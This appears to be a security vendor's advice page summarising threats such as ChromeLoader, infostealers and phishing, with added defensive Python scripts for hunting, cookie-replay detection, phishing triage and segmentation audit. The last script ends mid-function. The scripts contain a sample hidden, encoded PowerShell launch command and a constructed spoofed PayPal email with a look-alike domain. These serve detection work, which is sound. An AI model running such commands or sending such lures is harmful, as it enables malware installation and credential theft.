Cybersecurity Advice

Our cybersecurity advice section provides comprehensive information about the latest online security threats – not only the threats from unfiltered spam emails, but also the risks present on the Internet from malvertising and vulnerable websites onto which malware exploit kits may have been loaded by cybercriminals.

We also provide advice on the precautions that can be taken to strengthen cybersecurity defenses and mitigate the risk of inadvertently downloading malware. The message throughout our cybersecurity advice is to protect your network and WiFi systems with an email spam filter and a web content control solution.

How to Protect Against Web-based Malware Attacks

Cybercriminals use a variety of tactics, techniques, and procedures for distributing malware. Email is one of the most common attack vectors, but web-based malware attacks are becoming more common. In this article, we explore some of the ways that traffic is driven to malicious websites hosting malware and suggest ways that businesses can protect themselves against these attacks.

SEO Poisoning

SEO poisoning is the manipulation of search engine results to get malicious websites to appear high in the rankings for specific search terms, often terms likely to be used by business users. Cybercriminals create a website or web page, or compromise an existing website and add a page with malicious content, often choosing a domain name or page URL very similar to that of the brand being spoofed. Black hat search engine optimization techniques are then used to trick search engines into ranking the page highly for a specific search term or set of search terms. Common techniques include keyword stuffing (adding many relevant keywords to the HTML and text), backlinking campaigns (adding many backlinks to the website from other websites, for example via private link networks), cloaking (showing different content to search engine crawlers than to genuine visitors), and artificially inflating click-through rates.

These techniques may be used to promote phishing and other scams, but they are most commonly used for malware distribution. A visitor to the site is offered a download related to their search term, or is otherwise prompted to download a file that silently installs malware and gives the attacker access to their device.

Search Engine Ad Abuse / Malvertising

It is easy to create a malicious website for malware distribution, but traffic needs to be driven to that website. Phishing emails are commonly used, but email filters are getting much better at detecting malicious hyperlinks.
Instead, cybercriminals can drive traffic to malicious content via Google Ads and other search engine ad platforms or by adding malicious adverts to third-party ad blocks on legitimate websites. Many websites display these adverts as a way of...

ChromeLoader Malware on the Rise: How to Prevent Infection

ChromeLoader is a family of malware that is extremely prevalent and persistent. The malware installs malicious browser extensions, and removing them can be problematic because the malware blocks access to the Google Chrome extension list so that the extensions cannot be removed if they are discovered. These extensions are used to deliver unwanted ads and to redirect users to websites they would otherwise not visit. At best, an infection is a nuisance; however, the malware increases the attack surface of the system and can easily lead to other malware being delivered.

ChromeLoader was first observed in January 2022 and infections are now extremely widespread. The malware is most commonly spread via sites that offer pirated software (torrents and warez sites), usually delivered through infected ISO image files. Several campaigns have been detected that advertise pirated software, games, and movies on social media networks, especially Twitter, with the posts including links to the download sites. When the installation file is downloaded and run, the user will likely get the software, operating system, or game they were expecting, but ChromeLoader and/or other malware will also be installed.

A new ChromeLoader distribution campaign has recently been detected by HP's Wolf Security team. They report that the campaign has been active since at least March 2023 and delivers ChromeLoader, which installs a malicious adware browser extension called Shampoo. Shampoo performs unwanted redirects to a variety of websites, including fake giveaways, games, and dating sites. These redirects may simply be annoying, but they also risk further malware infections. The extension is difficult to uninstall because the user is prevented from accessing the Chrome Extensions page, and if the user does manage to remove it, a Windows scheduled task simply reloads it when the device is rebooted.
According to HP, this campaign uses a network of malicious websites that offer pirated material. The download sites deliver VBScripts that execute PowerShell scripts that fetch Shampoo and install the malicious Chrome extension....
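
As an added illustration of how a defender would look for the chain described above in endpoint telemetry (this is example code written for this page, not HP's or the article's own), the following Python script scores process-creation and scheduled-task records for the three behaviours the text mentions: a script host spawning PowerShell, a browser started with an extension loaded from disk, and a scheduled task that re-launches the chain at boot. The record layout, the field names and the "--load-extension" indicator are assumptions, and the sample events are constructed, not captured from a real infection.

```python
"""Hunt for the infection chain the article describes (VBScript -> PowerShell ->
unpacked Chrome extension, re-launched by a scheduled task) in process and
scheduled-task telemetry.

Added example, not code from the original article or from HP's report. The
record layout, field names and sample events are constructed for this
illustration. The '--load-extension' indicator is an assumption: the article
says the extension is installed and reloaded by a task, not how Chrome is
launched, so treat that check as a heuristic to validate against your own data.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
ENCODED = re.compile(r"(?i)\s-(enc|encodedcommand)\b")
HIDDEN = re.compile(r"(?i)-w(indowstyle)?\s+hidden")

# Constructed sample: process-creation events (parent image, image, command line).
# The base64 after -enc is a truncated placeholder, not a real payload.
PROCESS_EVENTS = [
    {"parent": "explorer.exe", "image": "chrome.exe",
     "cmdline": "chrome.exe https://example.com"},
    {"parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAoA..."},
    {"parent": "powershell.exe", "image": "chrome.exe",
     "cmdline": 'chrome.exe --load-extension="C:\\Users\\u\\AppData\\Roaming\\ext" --no-first-run'},
    {"parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

# Constructed sample: scheduled tasks and the command each one runs.
TASK_ACTIONS = [
    {"task": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "command": "%windir%\\system32\\defrag.exe -c -h -o -$"},
    {"task": "\\chrome_update_task",
     "command": "powershell.exe -w hidden -enc SQBFAFgAIAAoA..."},
]


def classify_process(ev):
    """Return the reasons this process event looks like part of the chain."""
    parent, image, cmd = ev["parent"].lower(), ev["image"].lower(), ev["cmdline"]
    reasons = []
    if image == "powershell.exe":
        if parent in SCRIPT_HOSTS:
            reasons.append("script host spawned PowerShell")
        if ENCODED.search(cmd):
            reasons.append("encoded PowerShell command")
        if HIDDEN.search(cmd):
            reasons.append("hidden window")
    if image == "chrome.exe" and "--load-extension" in cmd:   # assumption, see docstring
        reasons.append("Chrome started with an unpacked extension from disk")
        if parent == "powershell.exe":
            reasons.append("browser launched by PowerShell")
    return reasons


def classify_task(task):
    """Return the reasons this scheduled task looks like the persistence step."""
    cmd = task["command"]
    reasons = []
    if re.search(r"(?i)powershell", cmd) and ENCODED.search(cmd):
        reasons.append("scheduled task runs encoded PowerShell")
    if "--load-extension" in cmd:
        reasons.append("scheduled task re-launches the browser with an unpacked extension")
    return reasons


def hunt(process_events, task_actions):
    """Collect every record with at least one reason; an empty list means nothing found."""
    hits = []
    for ev in process_events:
        reasons = classify_process(ev)
        if reasons:
            hits.append(("process", ev["image"], reasons))
    for task in task_actions:
        reasons = classify_task(task)
        if reasons:
            hits.append(("task", task["task"], reasons))
    return hits


if __name__ == "__main__":
    for kind, name, reasons in hunt(PROCESS_EVENTS, TASK_ACTIONS):
        print(f"{kind:8} {name}: {'; '.join(reasons)}")
```

On the constructed data the script flags the PowerShell spawned by wscript.exe, the browser launched by PowerShell with an on-disk extension, and the task that re-runs the encoded PowerShell; the benign Chrome launch, svchost and the Windows defrag task score nothing. Each reason is reported separately so an analyst can see which part of the chain was observed rather than a single opaque score.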

Search Engine Poisoning for Malware Distribution

There has been a notable increase in search engine poisoning for distributing malware. Search engine poisoning is the manipulation of search engine results to display links to malicious websites. These websites can be used to phish for sensitive information, but the technique is most commonly used for distributing malware.

Search engine poisoning can be achieved in different ways. One way it is used to target businesses is to create a webpage and use search engine optimization techniques to target specific search queries. It can take a lot of time and effort to get webpages appearing in the organic search results for competitive search terms, but the queries typically targeted have little competition, so it is quite easy to get pages appearing high in the organic listings. Attackers typically target low-volume business search queries, such as searches for contract templates, forms, and agreements. Since the person performing the search is looking to download content, they can easily be tricked into downloading a malicious file. Often the user does get the file they were looking for, but opening it silently installs malware.

The higher a webpage appears in the search results, the more likely it is to be visited. The prime spots at the very top of the results page are reserved for sponsored links, so getting a malicious site into those links maximizes traffic. Advertisers compete for these slots through the Google Ads platform, bidding on the search terms they want to target. Google Ads are increasingly being used by malicious actors as an alternative method of search engine poisoning, and they achieve the greatest success when they target popular software downloads.
An attacker will create a website advertising a popular software solution, often cloning the website of a legitimate brand. They will offer a download of that software on the site but will alter the installation file so that in addition to installing the software, malicious code will...

Review Your Cybersecurity Strategy to Ensure it is Still Effective

There has been an increase in the use of information-stealing malware by cybercriminals. Infostealers are installed to steal a range of sensitive data from a user's device, such as system information, usernames and passwords, and cryptocurrency wallets. They typically include keystroke logging, so usernames and passwords can be captured and exfiltrated to the attacker's command and control server, allowing the user's accounts to be accessed.

In 2022, cybercriminals increasingly used this type of malware in attacks on businesses. The latest infostealers have been developed specifically for that purpose: instead of targeting individual accounts, they are used for much more extensive attacks on businesses, stealing system information and session cookies that allow multifactor authentication controls to be bypassed. If the malware is installed, changing passwords has little effect, as the attacker is already in the system. Multifactor authentication can prevent stolen credentials from being used, but a stolen session cookie is accepted without a second factor, so MFA is not effective once the device has been compromised. Further, phishing kits are now in use that capture session cookies and bypass multifactor authentication.

Phishing attacks have also become more sophisticated, and a wide range of malicious attachments are now used to distribute malware and direct users to malicious websites. Office documents are still common, but compressed archives, ISO files, OneNote files, image files, HTML files, and more are also used, many of which are not blocked by email security solutions.
To protect against these new malware variants and multifactor authentication-bypassing phishing attacks, businesses need to rethink their protections. An email security solution is required to block malware delivery via email and identify and block the phishing emails that are used for credential theft. Email security solutions will...
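
The point above about session cookies deserves a concrete control. The following Python example, added for this page and not taken from the article, shows a server-side session store that binds each cookie to a coarse client context and to an absolute lifetime, and revokes the cookie and raises an alert when it is presented from somewhere else. The fingerprint fields, the eight-hour lifetime, the in-memory store and the sample client contexts are assumptions made for the illustration. Binding does not help when the infostealer drives the browser on the victim's own machine, but it does catch the cookie being replayed from the attacker's infrastructure, which is the common case.

```python
"""Detect replay of a stolen session cookie from a different client context.

Added example, not code from the original article. It assumes a web
application that keeps server-side session records and can demand a fresh
MFA step; the fingerprint fields, the lifetime, the sample client contexts and
the in-memory store are assumptions made for this illustration.
"""
import hashlib
import hmac
import secrets
import time

ABSOLUTE_LIFETIME = 8 * 3600   # seconds before a fresh MFA prompt is required (assumption)


def fingerprint(client_ip, user_agent):
    """Coarse client context: the /24 of the source address plus the User-Agent.
    Coarse on purpose so that normal DHCP churn does not log users out."""
    network = ".".join(client_ip.split(".")[:3])
    return hashlib.sha256(f"{network}|{user_agent}".encode()).hexdigest()


class SessionStore:
    def __init__(self, clock=time.time):
        self.clock = clock           # injectable so tests can move time forward
        self.sessions = {}           # token -> record
        self.alerts = []             # (user, detail) for the SOC queue

    def issue(self, user, client_ip, user_agent):
        """Called after password + MFA succeed; returns the cookie value."""
        token = secrets.token_urlsafe(32)
        self.sessions[token] = {
            "user": user,
            "issued": self.clock(),
            "fp": fingerprint(client_ip, user_agent),
        }
        return token

    def validate(self, token, client_ip, user_agent):
        """Return (ok, reason). Any failure revokes the token, so a replayed
        cookie cannot be retried against a different check."""
        record = self.sessions.get(token)
        if record is None:
            return False, "unknown token"
        if self.clock() - record["issued"] > ABSOLUTE_LIFETIME:
            del self.sessions[token]
            return False, "expired: re-authenticate with MFA"
        if not hmac.compare_digest(record["fp"], fingerprint(client_ip, user_agent)):
            # Revoke for everyone, including the legitimate user: they lose a
            # session, the attacker loses the foothold, and the SOC hears about it.
            del self.sessions[token]
            self.alerts.append((record["user"], "session cookie presented from a new client context"))
            return False, "context mismatch: re-authenticate with MFA"
        return True, "ok"


if __name__ == "__main__":
    store = SessionStore()
    cookie = store.issue("alice", "10.1.2.3", "Mozilla/5.0 (Windows NT 10.0)")
    print(store.validate(cookie, "10.1.2.77", "Mozilla/5.0 (Windows NT 10.0)"))   # same office, ok
    print(store.validate(cookie, "203.0.113.9", "curl/8.0"))                       # replayed elsewhere
    print(store.alerts)
```

The design choice worth noting is that a mismatch revokes rather than merely denies: a cookie that has been seen from two contexts is compromised whichever request was the legitimate one, so the right outcome is a forced re-authentication for the user and a ticket for the SOC, not a silent 403 that the attacker can probe around.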

5 Reasons Why You Should Conduct Phishing Simulations on Employees

Cybersecurity experts agree that security awareness training is an important part of any cybersecurity strategy. You can implement next-generation technology to repel malicious actors and to prevent and rapidly detect cyberattacks, but it is important not to forget the human element. According to the Verizon 2022 Data Breach Investigations Report, 82% of data breaches involve the human element. Through training, you can teach cybersecurity best practices, reduce the risky behaviors that open the door to hackers, and train employees to identify phishing.

The percentage of companies providing security awareness training to their employees is increasing as the importance of training becomes better understood, but one part of the training process that is often neglected is conducting phishing simulations on the workforce. Phishing simulations are fake but realistic phishing emails that businesses send internally to their employees. You may wonder why you would do such a thing. There are clear benefits, and here we provide five reasons why conducting phishing simulations on employees is worthwhile.

1. Create a Baseline to Measure the Effectiveness of your Training

Many companies provide security awareness training but are unable to measure its effectiveness, other than by a reduction in data breaches and phishing incidents. Phishing simulations are a great way to monitor the effectiveness of training over time and to show the return on investment. Conduct phishing simulations before you start your training program and you have a baseline against which to measure the effectiveness of training over time and to see the ROI.

2. Test the Effectiveness of Training in a Work Setting

You can show an employee the signs of phishing they need to look out for, and you can test that they have understood the training at the end of the course, but that does not mean the training will be remembered or applied when they are at work. Phishing is often successful because the emails arrive in inboxes when employees are busy, and that is when mistakes are made. Phishing simulations allow you to test...

Common Web-Based Attacks That You Should Be Protecting Against

Cybercriminals have a diverse arsenal for conducting attacks. Phishing is a leading attack vector for ransomware gangs, nation-state threat actors, and other cybercriminals, and even the protection provided by multifactor authentication is now being bypassed in some sophisticated campaigns. Unpatched vulnerabilities are often exploited to gain access to networks, and brute force attacks are used to guess weak credentials, but many attacks are conducted over the web.

Common Web-Based Threats

Malicious adverts are submitted to advertising networks, which display them in the third-party ad blocks on many of the most popular websites. Termed malvertising, these adverts redirect users to malicious websites where malware is downloaded, or to phishing content. The adverts often promote fictitious software, which users are tricked into downloading and installing. Often a genuine program is installed, with malware installed alongside it in the background.

Despite the controls Google has in place for detecting malicious content, some malicious ads are displayed in the search engine listings. These adverts appear at the top of the Google listings, so they can attract considerable traffic. In the fall of 2021, one such campaign targeted cryptocurrency investors and caused losses of more than $500,000 before Google detected and removed the malicious adverts from its Google Ads platform.

Malicious websites are also displayed in the search engine listings for specific business searches, with SEO poisoning techniques used to get the sites to appear high in the listings. These websites may only have a short shelf life before they are detected and removed, but they are created in such volume that they pose a significant risk. These campaigns are commonly used for distributing malware, with users tricked into thinking they are downloading the content or program they were searching for.
Another common web-based attack involves pirated software and copyright-infringing material that is added to peer-to-peer file-sharing networks, where the user is tricked into installing the malware in the belief they are...

Erbium Malware: Dangerous New Information Stealer Being Distributed via Warez Sites

A new and dangerous malware called Erbium is being advertised on hacking forums and has the potential to become a major threat. Erbium is an information stealer with extensive functionality, offered under the malware-as-a-service (MaaS) model.

MaaS provides hackers with an easy way to conduct attacks. The MaaS operators develop their malware and lease it out, usually charging a weekly, monthly, or annual subscription, and provide detailed instructions on how to conduct attacks, so the malware can be used without programming expertise. Many MaaS operations make conducting attacks incredibly easy, requiring little technical skill: after signing up, the malware is operated via a web-based UI, where users can access the stolen data, and live chat is often available to resolve any issues.

Currently, one of the most popular information stealers available under the MaaS model is RedLine Stealer, a highly capable malware variant that can be purchased outright or rented under a subscription. RedLine can steal browser data such as autocomplete entries and saved credentials, steal from FTP and IM clients, and steal from cryptocurrency wallets, and the latest variants allow users to upload and download files. RedLine has proven very popular; however, it is quite expensive.

Erbium is disrupting that market, offering broadly the same capabilities as RedLine for a fraction of the cost. Initially, Erbium was advertised at just $9 per week, although due to its popularity the price was increased to $100 per month. Even after the increase, it is far cheaper than RedLine, and based on user feedback it is proving very popular with the cybercrime community. Erbium is a work in progress, but it already has extensive capabilities.
The malware can steal information from browsers such as saved credentials, cookies, credit card numbers, and autofill information. It can steal from cryptocurrency wallets installed on web browsers and attempts to steal from a wide range of cold desktop cryptocurrency...

Bumblebee Loader Fast Becoming the Delivery Vehicle of Choice for Ransomware Gangs

Ransomware gangs gain initial access to business networks using a variety of techniques, with phishing one of the most common. Phishing is used to obtain credentials, especially for cloud-based services and applications, and phishing emails are often used to deliver malware loaders. Once installed, the loader drops further malicious payloads, which ultimately results in a network-wide ransomware attack.

A relatively new malware loader, Bumblebee, is now gaining popularity with ransomware gangs and is known to be used by some of the highest-profile ransomware operations. According to Symantec, Bumblebee is used by Conti, Quantum, and Mountlocker, and possibly others, and has fast become the ransomware delivery vehicle of choice. Bumblebee is primarily delivered via phishing emails and is used to create a backdoor into the victim's network, allowing the attacker to take control of devices and execute commands. It has been observed delivering the Cobalt Strike attack framework, which is used for lateral movement within networks. Once a sufficiently large number of devices and systems have been compromised, and sensitive data has been exfiltrated from the victim's systems, the ransomware payload is dropped and the file encryption process begins.

According to Symantec, Bumblebee has replaced several other malware variants that were popular with ransomware gangs in the past, such as the TrickBot Trojan and BazarLoader, and the switch appears to have been pre-planned. If Bumblebee is detected on any device, rapid action should be taken, as the infection is likely to lead to a ransomware attack.

The Growing Threat of Ransomware Attacks

Ransomware attacks on businesses increased significantly in 2021.
The Federal Bureau of Investigation (FBI) reported in its 2021 Internet Crime Report that the FBI Internet Crime Complaint Center (IC3) received 2,084 reports of ransomware attacks between January 1 and July 31, 2021, which represents a 62% increase year-over-year. The 2021...

Malicious QR Codes are Being Used for Phishing and Malware Distribution

Cybercriminals are constantly developing new tactics to trick individuals into divulging sensitive information or installing malware. One of the latest to be observed is the use of QR codes to direct people to malicious websites where sensitive information is harvested, or to sites hosting malware.

A QR code is a machine-readable matrix barcode that is often used for tracking products in a supply chain, but in recent years it has been adopted as a convenient way to direct people to web resources without them having to enter a URL or click a link. QR codes were widely adopted during the COVID-19 pandemic for contactless operations, such as registering attendance at a venue and viewing restaurant menus. Many smartphones have built-in QR code readers, and free apps are available for reading them. When a smartphone camera picks up a QR code, the user is taken to whatever web resource has been encoded in it, often after seeing no more than a short preview of the URL.

While QR codes have many legitimate uses, they can easily be tampered with to direct individuals to malicious websites. Phishing emails often contain links to malicious websites masked by changing the text of the hyperlink. On a computer, hovering the mouse pointer over the hyperlink displays the URL to which the user will be directed; with a QR code, the user may be directed to the website immediately and prompted to enter banking credentials, Microsoft 365 credentials, or other sensitive information. Since QR codes are often used to direct individuals to hosted files, such as PDF restaurant menus, it would be easy to trick people into downloading malicious files through them. Such malware could give a cybercriminal access to the victim's mobile device, allowing them to steal sensitive information such as passwords or bank account details.
Many businesses use QR codes to direct customers to websites where payments can be processed, and the use of QR codes for this purpose has increased significantly during the pandemic to avoid contact with Point-of-Sale card readers. QR codes could be abused to direct...

Cost of a Ransomware Attack? $600 Million for Ireland’s Health Service Executive

Ransomware is now one of the biggest threats faced by businesses. When hackers gain access to business networks, it is now common for large quantities of data to be stolen prior to file encryption. Ransomware gangs know that businesses with good backup policies will be able to restore encrypted data from backups, but those businesses will still need to pay the ransom to prevent the release or sale of the stolen data. Even when files can be recovered from backups, many businesses feel they have no alternative but to pay to ensure the stolen data is deleted. Data from Coveware indicates that 70% of ransomware attacks now involve data theft.

Ransomware attacks are incredibly costly even if the ransom is not paid. Universal Health Services Inc. in the United States suffered a Ryuk ransomware attack in September 2020 and chose not to pay the ransom. Adding up the recovery costs, which included data restoration, cybersecurity consultants, notification letters to patients, and the loss of many services during remediation, the cost of the attack rose to $67 million.

While expensive, that cost is just a fraction of the cost of the recent Conti ransomware attack on Ireland's Health Service Executive (HSE). The May 2021 attack caused massive disruption to healthcare services in Ireland. Without access to patient records, patient safety was put at risk, non-urgent appointments had to be cancelled, and there were major delays in getting test results. A few days after issuing a ransom demand of €20 million, the Conti gang gave the HSE the decryption tools free of charge. Even with valid tools to decrypt the data, recovery has been slow and incredibly costly. Around a month after the tools were provided, many systems are still inaccessible, and HSE Chief Executive Paul Reid has said it is likely to take months before all systems are brought back online.
Simply eradicating the attacker from the network and recovering encrypted data is only part of the story. IT systems need to be upgraded, security greatly improved, and a security operation center needs to be set up to monitor the...

What are the Signs of a Phishing Email?

It used to be quite easy to identify a phishing email, but over the past few years scammers have really upped their game. Some of the phishing emails now being sent can fool even the most security-conscious and well-trained people, but if you know the signs of a phishing email, you should be able to identify and avoid all but the most sophisticated attempts.

What is Phishing?

Phishing is a tactic used by cybercriminals to obtain sensitive information through deception, often by impersonating a trusted source. It is also used to deceive people into taking an action that allows the attacker to achieve their aim, such as installing malware or changing security settings on a device. Phishing can be viewed as the digital equivalent of a confidence trick, so the tactics are nothing new. The name comes from fishing: with fishing, a lure or bait tricks a fish into swallowing a hook; with phishing, a lure tricks an individual into taking an action in the belief that the request is genuine.

Phishing can take place over the telephone, in person, via text message, on social media networks, or on chat platforms, although most commonly it occurs via email. Attacks are easy to perform: all that is needed is an email address to send the messages from and a phishing template. If credential theft is the goal, a website hosting a phishing kit is needed to harvest the credentials. Phishing kits are widely available on hacking forums, and malware can also be purchased, so an attacker really only needs email accounts to send the messages. Phishing emails range from basic to highly sophisticated, and while email security solutions are effective at identifying phishing emails and keeping them out of inboxes, no email security solution can block every phishing threat without also blocking an unacceptable number of genuine emails.

It is therefore essential that employees are taught how to spot the signs of a phishing email and conditioned in how to respond when a suspicious email is received.

Phishing Tactics are Constantly Changing!

There are tried and...

5 Effective Techniques to Help You Identify Phishing Emails

Learning how to identify phishing emails is an important skill, one that all employees need to master. Many phishing emails are easy to spot if you know the signs to look for. It is not necessary to spend a couple of minutes checking every email at work; that would leave little time for anything else. There are some quick checks that take a few seconds and allow you to identify most phishing emails, and performing them on each inbound email soon becomes second nature.

5 Easy Ways to Identify Phishing Emails

Listed below are 5 basic checks that should be performed to identify phishing emails. They cover the most common techniques used by phishers to steal your credentials or get you to install malware.

Check the Sender's Email Address

Many emails have a display name that differs from the actual email address, so it is important to check who the real sender is. The display name is set by the sender and can easily be chosen to make an email look genuine. You may receive an email with PayPal as the display name, but the sender's address could be on a non-PayPal domain, or could be a Gmail account or another free email service. Free email services such as Gmail, Yahoo, and Hotmail are rarely used by established businesses to contact customers. Check that the domain, the part of the email address after the @ symbol, matches the sender; for PayPal that would be paypal.com. Also check that the domain name is spelled correctly and that no letters have been transposed or replaced. It is common for an i to be replaced with the digit 1, for an m to be switched to rn, or for hyphens to be added to make a domain look official: Pay-Pal, for instance.

Carefully Check Hyperlinks in Emails

Phishing starts with an email, but the actual credential theft usually happens on a web page. Hyperlinks in the email direct people to a page where they are asked to enter sensitive information such as their email login credentials. These pages are usually carbon copies of genuine login prompts for services such as Office 365, apart from the domain on which the...
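
The sender and hyperlink checks above can be automated for triage. The Python script below is an added example written for this page, not code from the article; it parses a constructed message, compares the display name with the address domain, folds the common character substitutions (1 for i, rn for m, inserted hyphens) before comparing a domain with a known brand, and checks that the text shown for a link agrees with where it actually goes. The brand-to-domain table, the free-mail list and the substitution list are assumptions a real deployment would replace with its own, and the registrable-domain helper assumes no public-suffix list. The same check_url function applies to a URL decoded from a QR code, as discussed in the QR code article above, where there is no hover preview at all.

```python
"""Fast checks for the From header and the hyperlinks of an inbound email.

Added example, not code from the original article. The sample message is
constructed; the brand-to-domain table, the free-mail list and the confusable
substitutions are assumptions made for this illustration. check_url() applies
equally to a URL decoded from a QR code, where there is no hover preview.
Assumption: no public-suffix list, so the "registrable" domain is the last
two labels (example.co.uk would need extra handling).
"""
import re
from email import message_from_string, policy
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed: brands the organisation cares about and the domains they really use.
BRAND_DOMAINS = {"paypal": {"paypal.com"},
                 "microsoft": {"microsoft.com", "office.com", "live.com"}}
FREE_MAIL = {"gmail.com", "yahoo.com", "hotmail.com", "outlook.com"}
# Constructed: substitutions that make a domain read like the brand (order matters).
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("1", "i"), ("l", "i"), ("0", "o"), ("-", "")]
# Good enough for triage of simple HTML mail; a full HTML parser is the robust choice.
ANCHOR = re.compile(r'<a\b[^>]*\bhref="([^"]*)"[^>]*>(.*?)</a>', re.I | re.S)


def normalize(label):
    """Fold confusables so 'paypa1', 'pay-pal' and 'paypal' compare equal."""
    s = label.lower()
    for look_alike, real in CONFUSABLES:
        s = s.replace(look_alike, real)
    return s


def registrable(host):
    return ".".join(host.lower().strip(".").split(".")[-2:])


def brand_mismatch(host):
    """A finding if host imitates a known brand without being one of its domains."""
    domain = registrable(host)
    if any(domain in real for real in BRAND_DOMAINS.values()):
        return None
    label = domain.split(".")[0]
    for brand in BRAND_DOMAINS:
        if normalize(brand) in normalize(label):
            return f"'{host}' resembles {brand} but is not a {brand} domain"
    return None


def check_sender(from_header):
    display_name, addr = parseaddr(from_header)
    if "@" not in addr:
        return ["no usable sender address"]
    domain = addr.rsplit("@", 1)[1].lower()
    findings = [f"sender uses free webmail domain {domain}"] if domain in FREE_MAIL else []
    for brand, real in BRAND_DOMAINS.items():
        if brand in display_name.lower() and registrable(domain) not in real:
            findings.append(f"display name claims {brand} but address domain is {domain}")
    hit = brand_mismatch(domain)
    return findings + [hit] if hit else findings


def check_url(href, anchor_text=""):
    parsed = urlparse(href if "://" in href else "http://" + href)
    host = parsed.hostname or ""
    findings = [] if parsed.scheme == "https" else [f"link is not HTTPS: {href}"]
    hit = brand_mismatch(host)
    if hit:
        findings.append(hit)
    # Anchor text that looks like a URL or domain must agree with the real target.
    shown = re.search(r"(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})", anchor_text.lower())
    if shown and registrable(shown.group(1)) != registrable(host):
        findings.append(f"link text shows {shown.group(1)} but goes to {host}")
    return findings


def analyze(raw_message):
    msg = message_from_string(raw_message, policy=policy.default)
    body = msg.get_content() if msg.get_content_type() == "text/html" else ""
    links = {href: check_url(href, re.sub(r"<[^>]+>", "", text))
             for href, text in ANCHOR.findall(body)}
    return {"sender": check_sender(str(msg["From"])), "links": links}


# Constructed sample, not a real phishing email.
SAMPLE = (
    'From: "PayPal Support" <security@paypa1-verify.com>\n'
    "To: someone@example.com\n"
    "Subject: Action required on your account\n"
    "Content-Type: text/html; charset=utf-8\n\n"
    '<html><body><p>Please <a href="http://paypa1-verify.com/login">'
    "https://www.paypal.com/signin</a> to confirm your details.</p></body></html>\n"
)
```

Run against the constructed message, analyze(SAMPLE) reports two sender findings (the display name claims PayPal while the address domain does not, and paypa1-verify.com resembles the brand without being a PayPal domain) and three link findings (plain HTTP, a look-alike host, and link text showing www.paypal.com while the target is paypa1-verify.com). A mail from alice@paypal.com with a plain anchor produces no findings, which is the property a triage check must have before it goes anywhere near production.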

Malware Delivery via Phishing Emails is Increasing

Phishing is the biggest cyber threat faced by businesses. Phishing emails are malicious messages that use deception to obtain sensitive information or trick individuals into installing malware. During the pandemic, cybercriminals took advantage of COVID-19 trends and created phishing emails that spoofed trusted entities such as the World Health Organization (WHO) and the Centers for Disease Control and Prevention, offering up-to-date information on the coronavirus. Companies offering personal protective equipment (PPE) were impersonated when supply was short, and more recently pharmaceutical firms have been spoofed to send offers related to COVID-19 vaccines.

One of the primary aims of these scams is to obtain Microsoft 365 credentials, which give attackers access to the treasure trove of data typically found in email accounts. The compromised email accounts are then used in impersonation attacks on other individuals in the organization, or in business email compromise (BEC) attacks that trick finance department employees into making fraudulent wire transfers. A single compromised Microsoft 365 account can give attackers the foothold they need for a much more extensive attack on the organization, with phishing emails the initial attack vector used to deliver ransomware.

These phishing emails can be difficult for employees to identify, even when they have received security awareness training. Once an email lands in an inbox, there is a high chance of it being opened and of an employee taking the action it requests, so it is essential for businesses to have an effective email security solution in place that can identify and block these malicious messages.

Malware Delivery via Email is Increasing

Recent research has shown that phishing emails are now the primary method used to deliver malware, and the number of emails distributing malware is increasing.
A study recently published by HP in its threat insights report shows 88% of malware is now delivered via email, with the volume of messages distributing malware increasing by 12% from the previous quarter. Many of these emails contain executable files that directly install...

Network Segmentation Best Practices to Improve Internal Network Security

What is Network Segmentation?

Network segmentation is the practice of dividing a computer network into smaller physical or logical components. Two devices on the same network segment can talk to each other directly; for communication between segments, traffic must flow through a router or firewall, where it can be inspected and security policies applied.

Network segmentation is one of the key mitigations against data breaches and many other types of cybersecurity threat. In a segmented network, each group of devices has only the connectivity required for legitimate business use, which greatly restricts the ability of ransomware to spread. All too often, however, organizations operate an unsegmented network.

Segmentation can also boost performance: with fewer hosts on each subnet, local broadcast traffic is reduced. It improves monitoring and helps IT teams identify suspicious behavior, since traffic crossing a segment boundary passes a choke point where it can be logged. If you follow network segmentation best practices and set up firewall security zones, you can improve security and keep your internal network isolated and protected from web-based attacks.

Network Segmentation Benefits

There are many benefits to be gained from network segmentation, of which security is one of the most important. A totally flat and open network is a major risk. Segmentation improves security by limiting access to resources to the specific groups within the organization that need them, making unauthorized access more difficult. In the event of a system compromise, an attacker or unauthorized individual can reach only the resources on the same segment and those the firewall policy explicitly allows from it. If a third party must be given access to certain databases in the data center, segmentation lets you limit the resources they can reach, and it also provides greater protection against internal threats.

Network Segmentation Best Practices

Most businesses have a well-defined network structure that includes a secure internal network zone and an external untrusted...
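
To make the benefit concrete, the following Python example, added for this page and not taken from the article, audits constructed flow records against a zone plan and an allowed-flow table of the kind a segmented network is built around. Zone names, subnets, the permitted ports and the flow line format are all assumptions; the flow lines are constructed, not real NetFlow. Anything crossing a zone boundary that is not in the table is reported as a violation, and flows that never cross a boundary are called out separately because no firewall sees them.

```python
"""Audit observed flows against a segmentation policy.

Added example, not code from the original article. The zone plan, the
allowed-flow table, the flow line format and the flow records are assumptions
made for this illustration; the records are constructed, not real NetFlow.
"""
import ipaddress

# Constructed subnet plan: one zone per VLAN.
ZONES = {
    "workstations": ipaddress.ip_network("10.10.0.0/16"),
    "servers": ipaddress.ip_network("10.20.0.0/24"),
    "database": ipaddress.ip_network("10.30.0.0/24"),
    "guest_wifi": ipaddress.ip_network("192.168.50.0/24"),
    "management": ipaddress.ip_network("10.99.0.0/24"),
}

# Constructed allow-list: (source zone, destination zone) -> permitted destination ports.
# Everything not listed is denied at the firewall between zones.
ALLOWED = {
    ("workstations", "servers"): {443, 445},
    ("workstations", "internet"): {80, 443},
    ("servers", "database"): {5432},
    ("management", "servers"): {22, 443},
    ("management", "database"): {22, 5432},
    ("guest_wifi", "internet"): {80, 443},
}

# Ports on which workstation-to-workstation traffic is a lateral-movement path.
LATERAL_PORTS = {445, 3389}


def zone_of(ip):
    addr = ipaddress.ip_address(ip)
    for name, net in ZONES.items():
        if addr in net:
            return name
    return "internet" if addr.is_global else "unknown"


def evaluate(flow):
    """Return (verdict, detail) for one flow dict with src, dst, dport."""
    src_zone, dst_zone = zone_of(flow["src"]), zone_of(flow["dst"])
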